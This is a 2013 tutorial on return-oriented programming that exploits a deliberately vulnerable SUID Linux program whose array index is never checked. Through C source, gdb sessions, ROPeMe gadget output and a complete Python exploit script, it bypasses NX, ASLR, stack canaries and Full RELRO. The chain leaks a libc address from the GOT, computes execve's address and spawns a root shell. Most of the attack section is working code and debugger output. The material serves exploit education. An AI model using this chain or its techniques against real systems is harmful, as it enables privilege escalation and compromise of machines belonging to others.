An Introduction to Return-Oriented Programming (Linux)

April 15, 2013 by M G

INTRODUCTION:

In 1988, the Morris worm became the first widely known attack to exploit a buffer overflow, and it compromised many systems. More than 20 years later, applications are still vulnerable, despite the efforts made to harden them.

In the past, the hard part was discovering bugs; writing the exploit was so easy that nobody gave it much thought. Nowadays, exploiting a buffer overflow is difficult as well, because of advanced defensive technologies.

Several mitigations, such as ASLR and non-executable memory sections, are deployed in combination to make exploit development harder than ever.

In this tutorial, we will describe how to bypass ASLR, NX, ASCII ARMOR, SSP and RELRO at the same time and in a single attempt, using a technique called Return-Oriented Programming (ROP).

Let's begin with some basic/old definitions:

→ NX: non-executable memory sections (stack, heap), which prevent the execution of injected code. This protection is easy to defeat with a correct ret2libc attack or with the borrowed code chunks technique.

→ ASLR: Address Space Layout Randomization, which randomizes the location of memory regions (stack, heap and shared objects). It can be bypassed by brute-forcing the return address.

→ ASCII ARMOR: maps libc at addresses that start with a NULL byte, so those addresses cannot be written by string-based overflows. It is used to prevent ret2libc attacks.

→ RELRO: another exploit mitigation technique to harden ELF binaries. It has two modes:

  • Partial RELRO: ELF sections are reordered (.got, .dtors and .ctors precede the .data/.bss sections) and the non-PLT GOT is read-only. The PLT GOT is still writable, so an attacker can still overwrite it.
    Compile command: gcc -Wl,-z,relro -o bin file.c
  • Full RELRO: includes all Partial RELRO features and additionally remaps the whole GOT as read-only.
    Compile command: gcc -Wl,-z,relro,-z,now -o bin file.c

→ SSP: Stack Smashing Protection, which places a canary value between the local variables and the saved return address and aborts the program if the canary has changed when the function returns.

Our exploit will bypass all of these mitigations and remain reliable.

So let's go.

OVERVIEW OF THE CODE:

Here is the vulnerable code. The binary and the source are included at the end of the tutorial.

[c language="sharp"]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <errno.h>

void fill(int,int,int*);

int main(int argc,char** argv)
{
    FILE* fd;
    int in1,in2;
    int arr[2048];
    char var[20];

    if (argc !=2){
        printf("usage : %s <file>\n",*argv);
        exit(-1);
    }

    fd = fopen(argv[1],"r");
    if(fd == NULL)
    {
        fprintf(stderr,"%s\n",strerror(errno));
        exit(-2);
    }

    memset(var,0,sizeof(var));
    memset(arr,0,2048*sizeof(int));

    /* read the file two lines at a time: an index, then a value */
    while(fgets(var,20,fd))
    {
        in1 = atoll(var);
        fgets(var,20,fd);
        in2 = atoll(var);
        /* fill array */
        fill(in1,in2,arr);
    }
}

/* no bounds check: "of" comes straight from the input file */
void fill(int of,int val,int *tab)
{
    tab[of]=val;
}
[/c]

First, let's explain what the code does.

It opens the file named on the command line and reads it two lines at a time: in1 is used as an index into the array and in2 as the value to store at that index. It then calls fill() to write the value:

tab[in1]=in2 ;

The index is never checked against the size of the array, so the write can land outside it. When in1 is the index of the saved return address, we can write whatever we want there.
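To make the write primitive concrete, here is a minimal Python sketch of the read loop. It is a model, not the program itself: `parse_pairs` and `classify` are hypothetical helper names, and the sketch assumes a well-formed file with an even number of lines.

```python
ARR_LEN = 2048  # matches "int arr[2048]" in main()

def parse_pairs(text):
    """Return (index, value) pairs, two input lines per pair, like the loop in main()."""
    lines = text.splitlines()
    return [(int(lines[i]), int(lines[i + 1])) for i in range(0, len(lines) - 1, 2)]

def classify(index):
    """Say whether tab[index] falls inside arr or outside it."""
    return "inside arr" if 0 <= index < ARR_LEN else "outside arr"

# First pair stays in bounds, second pair uses the first index past the array.
for index, value in parse_pairs("1\n10\n2048\n255\n"):
    print(index, hex(value), classify(index))
```

Any index of 2048 or more (or a negative one) reaches memory that does not belong to arr, which is all the exploit needs.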

Let's compile the vulnerable code:

[cpp]
gcc -o vuln2 vuln2.c -fstack-protector -Wl,-z,relro,-z,now
chown root:root vuln2
chmod +s vuln2
[/cpp]

And we check the resulting binary using checksec.sh:

[cpp]
user@protostar:~/course$ checksec.sh --file vuln2
RELRO           STACK CANARY      NX            PIE       RPATH      RUNPATH      FILE
Full RELRO      Canary found      NX enabled    No PIE    No RPATH   No RUNPATH   vuln2
user@protostar:~/course$
[/cpp]

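So the binary is hardened, but a motivated attacker can still succeed.

As we will see, we can overwrite the saved EIP directly. A linear overflow would not work here: SSP checks a canary stored before the saved return address when the function returns, and if the canary has changed the program aborts and the exploit fails. Because the bug lets us write to a single chosen slot, we can change the return address without touching the canary.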
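The difference between the two kinds of write can be sketched in a few lines of Python. This is only an illustration under loud assumptions: the frame layout is simplified, and the canary value, saved EBP and saved EIP in `new_frame` are hypothetical placeholders, not values taken from vuln2.

```python
CANARY = 0x5A5A5A00  # hypothetical canary value

# Slot numbers in the simplified frame built by new_frame().
CANARY_SLOT, RET_SLOT = 4, 6

def new_frame():
    # Word-sized slots from low to high addresses:
    # 4 buffer words, canary, saved EBP, saved EIP (placeholder values).
    return [0, 0, 0, 0, CANARY, 0xBFFFF848, 0x0804877D]

def linear_overflow(frame, words):
    """Classic overflow: copy words from slot 0 upward, trampling everything on the way."""
    for i, word in enumerate(words):
        frame[i] = word

def indexed_write(frame, index, value):
    """The primitive in this tutorial: one write to one chosen slot."""
    frame[index] = value

def canary_intact(frame):
    return frame[CANARY_SLOT] == CANARY

a = new_frame()
linear_overflow(a, [0x41414141] * 7)    # reaches the return address, kills the canary
b = new_frame()
indexed_write(b, RET_SLOT, 0x41414141)  # reaches the return address only
print(canary_intact(a), canary_intact(b))  # False True
```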

OWNING EIP:

Let's open the binary with gdb and disassemble the main function:

gdb$ disas main
Dump of assembler code for function main:
0x08048624 <main+0>: push ebp
...
0x08048754 <main+304>: mov DWORD PTR [esp+0x202c],eax
0x0804875b <main+311>: lea eax,[esp+0x2c]
0x0804875f <main+315>: mov DWORD PTR [esp+0x8],eax
0x08048763 <main+319>: mov eax,DWORD PTR [esp+0x202c]
0x0804876a <main+326>: mov DWORD PTR [esp+0x4],eax
0x0804876e <main+330>: mov eax,DWORD PTR [esp+0x2030]
0x08048775 <main+337>: mov DWORD PTR [esp],eax
0x08048778 <main+340>: call 0x80487be <fill>
0x0804877d <main+345>: mov eax,DWORD PTR [esp+0x2034]
0x08048784 <main+352>: mov DWORD PTR [esp+0x8],eax
...

       

Let's create a simple file named 'simo.txt' and put the following in it:

[plain]
1
10
[/plain]

We set some breakpoints:

[cpp]
gdb$ b *main
Breakpoint 1 at 0x8048624
gdb$ b *0x08048778
Breakpoint 2 at 0x8048778
gdb$ run simo.txt
Breakpoint 1, 0x08048624 in main ()
gdb$ x/x $esp
0xbffff7cc: 0xb7eabc76
gdb$ continue
Breakpoint 2, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770: 0x00000001 0x0000000a 0xbfffd79c 0x00000000
gdb$ x/i 0x08048778
0x8048778 <main+340>: call 0x80487be <fill>
gdb$
[/cpp]

At the first breakpoint, ESP points to main's saved return address; at the second, the third argument on the stack is the address of arr:

0xbffff7cc: the location of main's return address

0xbfffd79c: the address of arr

If you're familiar with stack frames, you'll notice that we made the call fill(1,10,arr), which does the following: arr[1]=10 ;

The distance between the address of arr and the return address is 8240 bytes (0xbffff7cc-0xbfffd79c = 8240). Because arr is an array of int, we must divide the result by 4 (sizeof(int)): 8240/4 = 2060.
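The same arithmetic as a small Python helper, in case you want to redo it for other addresses. `slot_index` is a hypothetical name; the two addresses are the ones from the gdb session and will differ on another machine.

```python
def slot_index(target_addr, arr_addr, elem_size=4):
    """Index i such that &arr[i] == target_addr."""
    delta = target_addr - arr_addr
    if delta % elem_size != 0:
        raise ValueError("target is not aligned to an array element")
    return delta // elem_size

ARR_ADDR = 0xbfffd79c        # address of arr, from the gdb session
SAVED_EIP_ADDR = 0xbffff7cc  # where main's return address is stored

print(SAVED_EIP_ADDR - ARR_ADDR)             # 8240
print(slot_index(SAVED_EIP_ADDR, ARR_ADDR))  # 2060
```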

So if we use an index of 2060 we can write to the saved EIP. Let's check by putting the following in simo.txt (1094861636 is 0x41424344 in decimal):

[cpp]
2060
1094861636
[/cpp]

The result is:

[cpp]
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: 00000000 EBX: B7FD5FF4 ECX: B7FDF000 EDX: 00000000 o d I t s Z a P c
ESI: 00000000 EDI: 00000000 EBP: BFFFF848 ESP: BFFFF7D0 EIP: 41424344
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x41424344
0x41424344 in ?? ()
gdb$
[/cpp]

So we successfully own EIP and have bypassed Stack Smashing Protection.
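The input file takes decimal numbers, and the program stores the result of atoll() in an int. The sketch below shows the conversion for our test value, and what a 32-bit wrap-around does to a value above 0x7fffffff, such as a libc address. `to_int32` is a hypothetical helper; the wrap-around it models is what gcc does on x86, and the C standard leaves that conversion implementation-defined.

```python
def to_int32(n):
    """Keep the low 32 bits of n and reinterpret them as a signed int."""
    n &= 0xFFFFFFFF
    return n - 0x100000000 if n >= 0x80000000 else n

print(hex(1094861636))       # 0x41424344
print(to_int32(1094861636))  # 1094861636 (fits in an int, unchanged)

# A value above 0x7fffffff becomes negative but keeps the same 32-bit pattern.
wrapped = to_int32(0xb7f2c170)
print(wrapped < 0)                 # True
print(hex(wrapped & 0xFFFFFFFF))   # 0xb7f2c170
```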

Let's build our exploit now.

BUILDING THE EXPLOIT:

Our aim now is to build a ROP chain that calls execve(). As we can see below, there is no GOT entry for this function, and libc is randomized.

So we will first leak the address of a libc function from the GOT, then do some simple arithmetic to get the exact address of execve in libc.

And remember that we cannot overwrite the GOT because of Full RELRO.

[cpp]
readelf -r vuln2
08049fcc 00000107 R_386_JUMP_SLOT 00000000 __errno_location
08049fd0 00000207 R_386_JUMP_SLOT 00000000 strerror
08049fd4 00000307 R_386_JUMP_SLOT 00000000 __gmon_start__
08049fd8 00000407 R_386_JUMP_SLOT 00000000 fgets
08049fdc 00000507 R_386_JUMP_SLOT 00000000 memset
08049fe0 00000607 R_386_JUMP_SLOT 00000000 __libc_start_main
08049fe4 00000707 R_386_JUMP_SLOT 00000000 atoll
08049fe8 00000807 R_386_JUMP_SLOT 00000000 fopen
08049fec 00000907 R_386_JUMP_SLOT 00000000 printf
08049ff0 00000a07 R_386_JUMP_SLOT 00000000 fprintf
08049ff4 00000b07 R_386_JUMP_SLOT 00000000 __stack_chk_fail
08049ff8 00000c07 R_386_JUMP_SLOT 00000000 exit
[/cpp]

Let's leak the address of printf (you can choose any GOT entry):

[cpp]
gdb$ x/x 0x08049fec
0x8049fec <_GLOBAL_OFFSET_TABLE_+44>: 0xb7edbf90
gdb$ p execve
$9 = {<text variable, no debug info>} 0xb7f2c170 <execve>
gdb$ p 0xb7f2c170-0xb7edbf90
$10 = 328160
gdb$
[/cpp]

The offset between printf and execve is 328160.

ASLR moves libc as a whole, so this offset stays the same on every run. If we add 328160 to the address of printf that the loader stored in the GOT, we get the address of execve dynamically:

[cpp]
execve = printf@libc + 328160
[/cpp]
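Here is a short Python sketch of that calculation. The two addresses are the ones gdb printed for one particular run; `resolve_execve` and the 0x3000 shift used for the second run are hypothetical, chosen only to show that the offset does not depend on where libc is loaded.

```python
MASK32 = 0xFFFFFFFF

# Addresses observed in the gdb session (one particular run).
PRINTF_SEEN = 0xb7edbf90
EXECVE_SEEN = 0xb7f2c170
PRINTF_TO_EXECVE = EXECVE_SEEN - PRINTF_SEEN

def resolve_execve(leaked_printf):
    """Address of execve given the run-time address of printf."""
    return (leaked_printf + PRINTF_TO_EXECVE) & MASK32

print(PRINTF_TO_EXECVE)                  # 328160
print(hex(resolve_execve(PRINTF_SEEN)))  # 0xb7f2c170

# Hypothetical second run: libc loaded 0x3000 bytes higher.
shift = 0x3000
print(resolve_execve(PRINTF_SEEN + shift) == EXECVE_SEEN + shift)  # True
```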

The next step is to find some useful gadgets to build a chain of instructions. We'll use ROPEME to do that.

We generate a .ggt file, which contains short instruction sequences that end with a ret.

Each gadget executes a few instructions and then returns into data that we control.

[cpp]
ROPeMe> generate vuln2 6
[/cpp]

We need the following gadgets to build our exploit (in ROPeMe's output, ;; stands for ret):

[cpp]
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
0x804861fL: call eax ; leave ;;
0x804849cL: pop eax ; pop ebx ; leave ;;
[/cpp]

So let's build our ROP chain using those gadgets.

The plan: load 328160 into EAX and 0x138e9ff4 into EBX. You may ask: what is 0x138e9ff4?

Well, we have this gadget:

[cpp]
0x804886eL: add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
[/cpp]

We want ebx-0xb8a0008 = printf@got, so ebx = printf@got + 0xb8a0008 = 0x08049fec + 0xb8a0008 = 0x138e9ff4.

So EAX = 328160 and EBX = 0x138e9ff4.

When «add eax [ebx-0xb8a0008]» is executed, EAX will contain the address of execve, computed at run time.

After that, we use the «call eax» gadget to run execve, with the correct parameters placed on the stack.
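The effect of the gadget can be modelled in Python to double-check both numbers. This is a sketch under assumptions: `ebx_for` and `add_eax_mem` are hypothetical helper names, memory is a plain dictionary, and the GOT content is the value gdb showed for one run.

```python
MASK32 = 0xFFFFFFFF
DISP = 0x0b8a0008        # displacement hard-coded in the gadget
PRINTF_GOT = 0x08049fec  # GOT slot of printf, from readelf

def ebx_for(target_addr):
    """EBX value that makes [ebx - DISP] refer to target_addr."""
    return (target_addr + DISP) & MASK32

def add_eax_mem(eax, ebx, memory):
    """Model of: add eax, [ebx-0xb8a0008]"""
    return (eax + memory[(ebx - DISP) & MASK32]) & MASK32

memory = {PRINTF_GOT: 0xb7edbf90}  # GOT content seen in gdb for one run
ebx = ebx_for(PRINTF_GOT)
eax = add_eax_mem(328160, ebx, memory)
print(hex(ebx), hex(eax))  # 0x138e9ff4 0xb7f2c170
```

The chain itself never needs to know the libc base: it only carries the constant offset and the address of the GOT slot, and the processor does the addition at run time.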

There is one small problem to solve. When the leave instruction of the first gadget is executed, ESP is reloaded from EBP, which still holds the frame pointer that main restored on exit (0xbffff848 in the register dump above), so ESP leaves the slots we have filled so far. The solution is easy and works as before: with some simple arithmetic we find the slot from which the following ret will read.

[cpp]
0x8048778 <main+340>: call 0x80487be <fill>
Breakpoint 1, 0x08048778 in main ()
gdb$ x/4x $esp
0xbfffd770: 0x0000080c 0x0804849c 0xbfffd79c 0x00000000
[/cpp]

We continue.

[cpp]
0x804849f <_init+47>: ret
0x0804849f in _init ()
gdb$ x/x $esp
0xbffff84c: 0x0804886e
[/cpp]

After «leave» is executed, ESP points to an area that we have not written yet.

Since we can write at any index, we only need to know where ESP points: as before, we subtract the address of arr from ESP and divide by 4: (0xbffff84c-0xbfffd79c)/4 = 2092.
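The pivot can also be predicted without stepping through gdb, assuming EBP still holds 0xbffff848 when the gadget runs (the value in the register dump of the first crash). The helper name `after_leave` is hypothetical.

```python
ARR_ADDR = 0xbfffd79c       # address of arr, from gdb
EBP_AT_GADGET = 0xbffff848  # EBP after main's own leave (register dump of the first crash)

def after_leave(ebp):
    """leave = mov esp, ebp ; pop ebp. Return ESP as seen by the following ret."""
    esp = ebp  # mov esp, ebp
    esp += 4   # pop ebp consumes one 4-byte word
    return esp

esp = after_leave(EBP_AT_GADGET)
print(hex(esp))               # 0xbffff84c
print((esp - ARR_ADDR) // 4)  # 2092
```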

So our payload will look like this:

[python]
#!/usr/bin/python
# Each pair of lines is: index into arr, then the value to store there.
r = "\n"
p = str(2060) +r # index of main's return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # EAX
p += str(2062)+r
p += str(0x138e9ff4)+r # EBX
p += str(2092) +r # slot read by the ret that follows leave
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
p += str(2096) +r # next return address
p += str(0x41414141) +r # marker to confirm that we still control EIP
o = open("simo.txt","w")
o.write(p)
o.close()
[/python]

Let's see what happens:

[cpp]
Program received signal SIGSEGV, Segmentation fault.
--------------------------------------------------------------------------[regs]
EAX: B7F2C170 EBX: 00000002 ECX: B7FDF000 EDX: 00000000 o d I t S z a p c
ESI: 00000000 EDI: 00000000 EBP: BFFFF874 ESP: BFFFF860 EIP: 41414141
CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B
Error while running hook_stop:
Cannot access memory at address 0x41414141
0x41414141 in ?? ()
gdb$ x/x $eax
0xb7f2c170 <execve>: 0x8908ec83
gdb$
[/cpp]

It works!

EAX contains the address of execve and we still control EIP. The next step is to find a printable string and two pointers to NULL to use as the parameters of execve.

We search inside the binary using objdump:

[cpp]
user@protostar:~/course$ objdump -s vuln2 |more

vuln2: file format elf32-i386

Contents of section .interp:
 8048134 2f6c6962 2f6c642d 6c696e75 782e736f /lib/ld-linux.so
 8048144 2e3200 .2.
Contents of section .note.ABI-tag:
 8048148 04000000 10000000 01000000 474e5500 ............GNU.
 8048158 00000000 02000000 06000000 12000000 ................
[/cpp]

0x8048154 points to a printable ASCII string, «GNU», and 0x8048158 points to NULL bytes.
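Both addresses can be recomputed from the dump rows themselves. The following sketch assumes Python 3 (for bytes.fromhex); `find_in_dump_row` is a hypothetical helper, and the rows are copied from the objdump output of the .note.ABI-tag section.

```python
def find_in_dump_row(row_addr, hex_words, needle):
    """Return the address of needle inside one objdump -s row, or None."""
    data = bytes.fromhex("".join(hex_words))  # objdump -s prints bytes in memory order
    offset = data.find(needle)
    return None if offset < 0 else row_addr + offset

row1 = (0x8048148, ["04000000", "10000000", "01000000", "474e5500"])
row2 = (0x8048158, ["00000000", "02000000", "06000000", "12000000"])

print(hex(find_in_dump_row(row1[0], row1[1], b"GNU\x00")))           # 0x8048154
print(hex(find_in_dump_row(row2[0], row2[1], b"\x00\x00\x00\x00")))  # 0x8048158
```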

Our call is then execve(0x8048154, 0x8048158, 0x8049fb0): the file name is "GNU", and the argv and envp arguments each point to a NULL word, that is, to an empty list (0x8049fb0 is another address that holds NULL). But we don't have a command named GNU, so we will create a wrapper named GNU.c:

[c]
#include <unistd.h>

/* compile : gcc -o GNU GNU.c */
int main()
{
    char *args[]={"/bin/sh",NULL};
    execve(args[0],args,NULL);
}
[/c]

execve() does not search $PATH, so the relative name "GNU" is resolved against the current working directory. Put the compiled GNU binary in the directory from which you run vuln2.

Our final exploit:

[python]
#!/usr/bin/python
# Each pair of lines is: index into arr, then the value to store there.
r = "\n"
p = str(2060) +r # index of main's return address
p += str(0x804849c) +r # pop eax ; pop ebx ; leave ;;
p += str(2061) +r
p += str(328160)+r # offset between printf and execve
p += str(2062)+r
p += str(0x138e9ff4)+r # printf@got + 0xb8a0008
p += str(2092) +r # slot read by the ret that follows leave
p += str(0x804886e)+r # add eax [ebx-0xb8a0008] ; add esp 0x4 ; pop ebx
p += str(2096) +r
p += str(0x804861f) +r # call eax ; leave ;;
p += str(2097) +r
p += str(0x8048154) +r # filename: "GNU"
p += str(2098)+r
p += str(0x8048158) +r # argv: pointer to NULL
p += str(2099)+r
p += str(0x8049fb0) +r # envp: pointer to NULL
o = open("simo.txt","w")
o.write(p)
o.close()
[/python]
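If you prefer to keep the chain as data, the same file can be produced from a list of (index, value) pairs. This is only an alternative sketch of the script above: `build_payload` and `CHAIN` are hypothetical names, and the numbers are the ones used in this tutorial.

```python
def build_payload(writes):
    """Render (index, value) pairs in the two-lines-per-write format the program reads."""
    return "".join("%d\n%d\n" % (index, value) for index, value in writes)

CHAIN = [
    (2060, 0x0804849c),  # pop eax ; pop ebx ; leave ;;
    (2061, 328160),      # EAX: offset between printf and execve
    (2062, 0x138e9ff4),  # EBX: printf@got + 0xb8a0008
    (2092, 0x0804886e),  # add eax [ebx-0xb8a0008] ; ...
    (2096, 0x0804861f),  # call eax ; leave ;;
    (2097, 0x08048154),  # filename: "GNU"
    (2098, 0x08048158),  # argv: pointer to NULL
    (2099, 0x08049fb0),  # envp: pointer to NULL
]

payload = build_payload(CHAIN)
print(payload.splitlines()[:4])  # ['2060', '134513820', '2061', '328160']
```

Writing `payload` to simo.txt gives the same content as the script above, and keeping the slots in one table makes it easier to adjust an index when the stack layout changes.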

Let's run our attack:

[cpp]
user@protostar:~/course$ python exploit.py
user@protostar:~/course$ ./vuln2 simo.txt
# whoami
root
#
[/cpp]

It works: we got a shell with the privileges of the SUID binary, and we bypassed all of the exploit mitigations in one attempt.

If you inspect the process over several runs, you'll notice that the libc addresses change from one run to the next, yet the exploit still resolves execve reliably.

CONCLUSION:

We presented an attack against programs vulnerable to stack overflows that bypasses two of the most widely used protections (NX and ASLR) along with some others (Full RELRO, ASCII ARMOR, SSP).

With our exploit, we extracted from the address space of the vulnerable process information about the randomized addresses of libc functions, and used it to mount a classic ret2libc attack.

REFERENCES:

Payload Already Inside: Data Reuse for ROP Exploits
http://force.vnsecurity.net/download/longld/BHUS10_Paper_Payload_already_inside_data_reuse_for_ROP_exploits.pdf

Surgically returning to randomized lib(c)
http://security.dico.unimi.it/~gianz/pubs/acsac09.pdf